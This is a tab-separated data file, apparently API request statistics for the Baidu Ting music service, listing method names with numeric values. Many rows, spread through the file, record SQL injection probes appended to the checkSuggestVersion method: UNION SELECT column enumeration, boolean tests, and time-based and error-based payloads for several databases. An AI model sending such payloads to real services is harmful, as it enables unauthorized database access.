baidu.ting.	0
baidu.ting.artist.getSongList	61.987068258877
baidu.ting.artistapp.photo	30.319488817891
baidu.ting.diy.getNowOfficalList	9.5503509283461
baidu.ting.diy.search	39.698169866873
baidu.ting.favorite.addAlbumFavorite	85.68
baidu.ting.game.gameplay	197.88888888889
baidu.ting.mv.getIndexMV	35.038819875776
baidu.ting.mv.searchMV	79.858827777109
baidu.ting.plaza.getPartDesc	27.283714897912
baidu.ting.search.getPhotoInfo	28.380529397055
baidu.ting.search.lrcyss	64.131909514732
baidu.ting.song.baseInfo	11.697354467262
baidu.ting.user.activate	1.4431137724551
baidu.ting.user.checkSuggestVersion ORDER BY 1#	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion%\' AND 2385=CONVERT(INT,(SELECT CHAR(113) CHAR(121) CHAR(97) CHAR(102) CHAR(113) (SELECT (CASE WHEN (2385=2385) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(116) CHAR(111) CHAR(111) CHAR(113))) AND \'%\'=\'	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion) AND 7452=7452 AND (2683=2683	0
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL#	0
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion; WAITFOR DELAY \'0:0:5\'--	2
baidu.ting.user.checkSuggestVersion\' ORDER BY 1-- 	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\') AND 7452=7452 AND (\'xwEY\'=\'xwEY	0
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL-- 	4
baidu.ting.user.registToUC	6.768770172808
baidu.ting.video.recMv	170.01403508772
ting.baidu.cloud.record	25
ting.baidu.song.getinfos	16
baidu.ting.album.getAlbumstyle	20.75
baidu.ting.artist.getInfoList	164.66666666667
baidu.ting.cloud.checkFile	686.15089514066
baidu.ting.diy.gedanInfo	38.106432413995
baidu.ting.diy.getPlaylists	75.637246968584
baidu.ting.diy.getSongFromOfficalList	43.123881118852
baidu.ting.diy.upList	71.760233918129
baidu.ting.favorite.delSongFavorites	86.993917891536
baidu.ting.plaza.getRecommendAlbum	56.866918427016
baidu.ting.song.audio	105.69329773041
baidu.ting.song.getHash	1.1682242990654
baidu.ting.song.getMulInfo	36.535502550669
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	0
baidu.ting.user.checkSuggestVersion%\' AND SLEEP(5) AND \'%\'=\'	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion) AND 4850=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (4850=4850) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL) AND (2373=2373	0
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion); WAITFOR DELAY \'0:0:5\'--	0
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#	0
baidu.ting.user.checkSuggestVersion\') AND 2923=CAST((CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113))||(SELECT (CASE WHEN (2923=2923) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)) AS NUMERIC) AND (\'AmPl\'=\'AmPl	1
baidu.ting.user.checkSuggestVersion\') AND 9242=1254 AND (\'Bblk\'=\'Bblk	3
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion\') WAITFOR DELAY \'0:0:5\'--	2
baidu.ting.user.checkSuggestVersion\'); SELECT PG_SLEEP(5)--	2
baidu.ting.user.regPassport	105.91406864029
bbaidu.com	0
baidu.ting.album.getAlbumInfo	64.42016743914
baidu.ting.artist.getSongVote	1021
baidu.ting.billboard.catalog	0.15727753506553
baidu.ting.colorRing.getCode	462.88741721854
baidu.ting.diy.delListSong	79.406411582213
baidu.ting.diy.gedanHot	48.455037067227
baidu.ting.diy.getSimilarGedan	33.471930182709
baidu.ting.favorite.delSongFavorite	87.877697841727
baidu.ting.feedback.crash	0.20747622207476
baidu.ting.plaza.getFocusPic	44.764698071889
baidu.ting.plaza.getNewSongs	75.805676549108
baidu.ting.song.lry	115.75076151891
baidu.ting.user.addPassportInfo	289.29166666667
baidu.ting.user.checkComVersion	1.4815720379417
baidu.ting.user.checkSuggestVersion AND 2385=CONVERT(INT,(SELECT CHAR(113) CHAR(121) CHAR(97) CHAR(102) CHAR(113) (SELECT (CASE WHEN (2385=2385) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(116) CHAR(111) CHAR(111) CHAR(113)))	2
baidu.ting.user.checkSuggestVersion AND 4850=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (4850=4850) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL)	3
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL-- 	2
baidu.ting.user.checkSuggestVersion%\'; WAITFOR DELAY \'0:0:5\'--	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL#	0
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL-- 	5
baidu.ting.user.checkSuggestVersion\'); WAITFOR DELAY \'0:0:5\'--	3
baidu.ting.user.getMobileVcode	109.41907400079
ting.baidu.artistapp.brief	28.31421446384
ting.baidu.diy.getPlaylist	97.813674518574
baidu.ting.artist.getInfo	51.041008776487
baidu.ting.artist.getInfoByName	86.418604651163
baidu.ting.cloud.expand	52
baidu.ting.cloud.signature	2.6909090909091
baidu.ting.colorRing.authset	4325.9857082808
baidu.ting.colorRing.subscribe	5086.4684931507
baidu.ting.colorRing.toneset	884.66346153846
baidu.ting.diy.addList	102.9068923821
baidu.ting.diy.gedan	49.792593141693
baidu.ting.diy.getRecommendSpeical	26.029513888889
baidu.ting.favorite.getCollectSong	90.658835425189
baidu.ting.favorite.getFavoriteAlbum	149.59176552687
baidu.ting.favorite.getFavoriteSong	82.053890171343
baidu.ting.game.gamedetail	27.754541373118
baidu.ting.plaza.getArtistPlaza	92.099913867356
baidu.ting.radio.playAction	76.274209063986
baidu.ting.search.lrcys	53.951924588178
baidu.ting.song.getSuoSongInfo	48.728971962617
baidu.ting.song.play	25.624579152005
baidu.ting.tag.getHotTag	30.823367945232
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#	0
baidu.ting.user.checkSuggestVersion%\' AND 8188=9262 AND \'%\'=\'	3
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#	0
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL-- 	2
baidu.ting.user.checkSuggestVersion; SELECT SLEEP(5)-- 	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\') AND 4850=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (4850=4850) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL) AND (\'tUcc\'=\'tUcc	0
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\'; WAITFOR DELAY \'0:0:5\'--	3
baidu.ting.user.logout	71.868848542762
baidu.ting.video.category	0.1547356249343
baidu.ting.video.play	45.278772608657
baidu.ting.vip.checkVIPPromotion	0.41213653603034
ting.baidu.artistapp.news	45.51048951049
ting.baidu.artistapp.renum	172.95672546858
baidu.ting.active.start	25.592722190216
baidu.ting.artist.getHighSongList	58.07949790795
baidu.ting.billboard.billList	22.417239836771
baidu.ting.cloud.record	70.753541076487
baidu.ting.favorite.addSongFavorite	78.080828362763
baidu.ting.favorite.delAlbumFavorite	47.1171875
baidu.ting.mv.getMVCategory	0.19759679572764
baidu.ting.plaza.getMisNewSong	38
baidu.ting.plaza.recommend	142.18057438977
baidu.ting.search.catalogSug	51.003118061592
baidu.ting.search.suggestion	40.516074110541
baidu.ting.song.getMulInfos	51.753697958261
baidu.ting.song.playAAC	25.261239368165
baidu.ting.user.RegistToImsg	68.461896617649
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL#	0
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL#	0
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion); SELECT PG_SLEEP(5)--	0
baidu.ting.user.checkSuggestVersion); SELECT SLEEP(5)-- 	0
baidu.ting.user.checkSuggestVersion\' AND 2923=CAST((CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113))||(SELECT (CASE WHEN (2923=2923) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)) AS NUMERIC) AND \'GAid\'=\'GAid	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
ting.baidu.artistapp.send	222.75
baidu.music	0
baidu.ting.artist.getSpecialSongList	151.77408627147
baidu.ting.artist.getinfo	44.38433606479
baidu.ting.diy.getOfficialDiyList	37.975264294937
baidu.ting.favorite.getInfoFromView	103.89545454545
baidu.ting.game.catalog	0.23809523809524
baidu.ting.plaza.recdaily	47.113799347529
baidu.ting.radio.getChannelSong	52.846479046767
baidu.ting.search.common	94.56721832297
baidu.ting.search.getPhotoInfos	35.436476592768
baidu.ting.search.lrcpic	97.667515077584
baidu.ting.song.down	24.111178937072
baidu.ting.tag.getAllTag	36.183843147571
baidu.ting.tag.songlist	21.835406698565
baidu.ting.user.checkSuggestVersion AND 7452=7452	2
baidu.ting.user.checkSuggestVersion ORDER BY 1-- 	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion%\' AND 2123=(SELECT 2123 FROM PG_SLEEP(5)) AND \'%\'=\'	2
baidu.ting.user.checkSuggestVersion%\' ORDER BY 1-- 	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL#	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	4
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion%\'; SELECT SLEEP(5)-- 	2
baidu.ting.user.checkSuggestVersion) AND 2239=4890 AND (9665=9665	2
baidu.ting.user.checkSuggestVersion) AND 2923=CAST((CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113))||(SELECT (CASE WHEN (2923=2923) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)) AS NUMERIC) AND (5468=5468	4
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion\' AND 2123=(SELECT 2123 FROM PG_SLEEP(5)) AND \'THJg\'=\'THJg	2
baidu.ting.user.checkSuggestVersion\' AND 7452=7452 AND \'yjNR\'=\'yjNR	2
baidu.ting.user.checkSuggestVersion\' ORDER BY 1#	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL#	0
baidu.ting.user.listenAge	7.6992379145366
ting.baidu.search.lrcpic	109.3256227758
baidu.ting.artist.get72HotArtist	150.83943088453
baidu.ting.artist.getAlbumList	75.239943813488
baidu.ting.artist.getHighSongTitle	0.1748177399757
baidu.ting.artist.getQianQianArtist	70.791123480299
baidu.ting.billboard.billCategory	11.414543569588
baidu.ting.colorRing.listen	170.10986964618
baidu.ting.diy.addListSong	91.876037344398
baidu.ting.favorite.delCollectSong	101.38006712002
baidu.ting.game.gamelist	0.19774531188464
baidu.ting.mv.getMultiSongMVInfo	115.20919387075
baidu.ting.mv.playMV	44.265529337429
baidu.ting.outerPassport.profile	75.030426514534
baidu.ting.push.send	30
baidu.ting.search.catalogsug	79.148148148148
baidu.ting.song.cloud	86.271438038436
baidu.ting.song.getInfos	59.477366220252
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL-- 	3
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL#	0
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion) AND 2123=(SELECT 2123 FROM PG_SLEEP(5)) AND (6235=6235	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	5
baidu.ting.user.checkSuggestVersion) WAITFOR DELAY \'0:0:5\'--	2
baidu.ting.user.checkSuggestVersion\' AND 2385=CONVERT(INT,(SELECT CHAR(113) CHAR(121) CHAR(97) CHAR(102) CHAR(113) (SELECT (CASE WHEN (2385=2385) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(116) CHAR(111) CHAR(111) CHAR(113))) AND \'nZdP\'=\'nZdP	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL#	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#	4
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion\' WAITFOR DELAY \'0:0:5\'--	2
baidu.ting.user.checkSuggestVersion\') AND 2123=(SELECT 2123 FROM PG_SLEEP(5)) AND (\'aWJg\'=\'aWJg	2
baidu.ting.user.checkSuggestVersion\') ORDER BY 1#	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\'; SELECT PG_SLEEP(5)--	3
baidu.ting.user.getMessage	16.082419220517
ting.baidu.plaza.getFocusPic	40.221453287197
ting.baidu.song.cloud	51
baidu.ting.album.getList	288.88222601816
baidu.ting.diy.addListenCount	31.89973707117
baidu.ting.diy.delList	82.159625390219
baidu.ting.favorite.addSongFavorites	122.4383967971
baidu.ting.favorite.getListenHistory	52.469879518072
baidu.ting.feedback.info	34.33631713555
baidu.ting.user.checkSuggestVersion	1.2633815791213
baidu.ting.user.checkSuggestVersion AND SLEEP(5)	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion%\' AND 7452=7452 AND \'%\'=\'	2
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#	4
baidu.ting.user.checkSuggestVersion%\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion%\' WAITFOR DELAY \'0:0:5\'--	2
baidu.ting.user.checkSuggestVersion%\'; SELECT PG_SLEEP(5)--	2
baidu.ting.user.checkSuggestVersion) ORDER BY 1#	3
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL#	3
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL-- 	4
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL#	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	0
baidu.ting.user.checkSuggestVersion\') ORDER BY 1-- 	3
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL#	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\'); SELECT SLEEP(5)-- 	2
baidu.ting.user.config	1.2788833779823
baidu.ting.user.down	19.175462224221
baidu.ting.vip.checkUserExchange	24
ting.baidu.artistapp.briefs	21.538461538462
ting.baidu.cloud.signature	0
ting.baidu.diy.getPlaylists	70.455213418038
ting.baidu.favorite.getCollectSong	305
baidu.ting.diy.category	1.9954915408775
baidu.ting.diy.getPlaylist	98.733029444376
baidu.ting.favorite.isCollect	5.6789658526156
baidu.ting.feedback.song	0.20007121740355
baidu.ting.plaza.active	1.3577490742217
baidu.ting.radio.getArtistChannelSong	60.906712371891
baidu.ting.radio.getFavoriteSong	215.55573909035
baidu.ting.user.checkSuggestVersion AND 2923=CAST((CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113))||(SELECT (CASE WHEN (2923=2923) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)) AS NUMERIC)	2
baidu.ting.user.checkSuggestVersion%\' AND 2923=CAST((CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113))||(SELECT (CASE WHEN (2923=2923) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)) AS NUMERIC) AND \'%\'=\'	3
baidu.ting.user.checkSuggestVersion%\' AND 4850=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (4850=4850) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL) AND \'%\'=\'	2
baidu.ting.user.checkSuggestVersion%\' ORDER BY 1#	2
baidu.ting.user.checkSuggestVersion) AND SLEEP(5) AND (5565=5565	0
baidu.ting.user.checkSuggestVersion) ORDER BY 1-- 	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\' AND 4850=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(97)||CHR(102)||CHR(113)||(SELECT (CASE WHEN (4850=4850) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(111)||CHR(111)||CHR(113)||CHR(62))) FROM DUAL) AND \'eaTe\'=\'eaTe	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\') AND SLEEP(5) AND (\'hQnW\'=\'hQnW	2
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion\') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion\'; SELECT SLEEP(5)-- 	2
baidu.ting.user.login	142.55479452055
baidu.ting.user.nplogin	108.97655353337
ting.baidu.artistapp.newList	18.492063492063
ting.baidu.film.getFilmInfo	46.092364184163
baidu.ting.artist.getList	27.941188544426
baidu.ting.diy.saveList	124.71058211257
baidu.ting.favorite.getOffenListenList	53.302593659942
baidu.ting.radio.getCategoryList	72.335212523896
baidu.ting.radio.serv	223.36802871342
baidu.ting.song.buffer	24.329154594546
baidu.ting.song.getInfo	17.573944902476
baidu.ting.song.getPic	38.672316384181
baidu.ting.user.checkSuggestVersion AND 2123=(SELECT 2123 FROM PG_SLEEP(5))	0
baidu.ting.user.checkSuggestVersion AND 2623=5556	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL#	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion UNION ALL SELECT NULL,NULL,NULL,NULL-- 	4
baidu.ting.user.checkSuggestVersion WAITFOR DELAY \'0:0:5\'--	2
baidu.ting.user.checkSuggestVersion) AND 2385=CONVERT(INT,(SELECT CHAR(113) CHAR(121) CHAR(97) CHAR(102) CHAR(113) (SELECT (CASE WHEN (2385=2385) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(116) CHAR(111) CHAR(111) CHAR(113))) AND (7851=7851	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- 	2
baidu.ting.user.checkSuggestVersion; SELECT PG_SLEEP(5)--	3
baidu.ting.user.checkSuggestVersion\' AND 2908=5657 AND \'PkCk\'=\'PkCk	0
baidu.ting.user.checkSuggestVersion\' AND SLEEP(5) AND \'catx\'=\'catx	2
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL,NULL,NULL-- 	3
baidu.ting.user.checkSuggestVersion\' UNION ALL SELECT NULL-- 	3
baidu.ting.user.checkSuggestVersion\') AND 2385=CONVERT(INT,(SELECT CHAR(113) CHAR(121) CHAR(97) CHAR(102) CHAR(113) (SELECT (CASE WHEN (2385=2385) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(116) CHAR(111) CHAR(111) CHAR(113))) AND (\'TBBa\'=\'TBBa	2
baidu.ting.user.checkVersion	1.1953877296203
baidu.ting.user.getUserBaseInfo	124.63501549128
baidu.ting.video.getList	25.457835313155
ting.baidu.plaza.recdaily	47.40091026956
ting.baidu.song.buffer	37.666666666667
